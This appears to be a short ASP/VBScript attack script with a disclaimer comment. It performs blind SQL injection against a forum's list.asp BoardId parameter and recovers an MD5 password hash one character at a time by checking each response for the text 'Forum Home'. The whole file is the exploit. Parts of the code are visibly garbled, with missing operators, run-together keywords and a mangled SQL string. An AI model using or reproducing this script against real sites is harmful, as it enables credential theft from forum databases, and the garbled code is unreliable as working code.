'Do not use for illegal purposes, this code is just to let the majority of ASP enthusiasts understand the principle and prevent it.
Function Bytes2bstr (VIN)
DIM STRRETURN
Dim I, thischarcode, Nextcharcode
Strreturn = ""
For i = 1 to lenb (vin)
Thischarcode = ASCB (MIDB (Vin, I, 1))
IF thischarcode <& h80 then
Strreturn = strreturn & chr (thischarcode)
Else
Nextcharcode = ASCB (MIDB (VIN, I 1, 1))
Strreturn = strreturn & chr (thischarcode) * & H100 cint (nextcharcode))
i = i 1
END IF
NEXT
BYTES2BSTR = STRRETURN
END FUNCTION
function getHTTPPage (url) dim httpset http = createobject ( "MSXML2.XMLHTTP") Http.open "GET", url, falseHttp.send () if Http.readystate <> 4 then exit functionend ifgetHTTPPage = bytes2BSTR (Http.responseBody) set http = Nothingif Err.Number <> 0 Then Err.clear End Function
Function Regexptest (PATRN, STRNG) DIM REGEX, RETVAL 'Establishs variable. Set regex = new regexp 'establishes regular expressions. Regex.pattern = PATRN 'Setting mode. Regex.ignoreCase = false 'Set whether you are case sensitive. Regexptest = regex.test (strng) 'Performs a search test. END FUNCTION
Password = "" Keyword = "Forum Home" 'Returns the string URL1 = "http://qq/bbs/list.asp? BoardId = 7"' SQL injection portfolius = 32'md5 password usually 32-bit DIM Passpass = Array (48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102) 'The cryptographic value is usually 0-9, AF
Server.scripttimeout = 999for i = 1 to passlenflag = falseURL = URL1 & "AND (SELECT ASC (MID (Password," & I & I & I & I & I & I & I & I & I & I & I & I & I)) = "'Constructed SQL statement here is key for J = 0 to Ubound (pass) str = gethttppage (URL & Pass (j)) Flag = regexptest (keyword, str) if flag = true kil tpassword = password & chr (pass (j)) EXIT Forend iFNextNextNextNextNext
Response.write (Password)
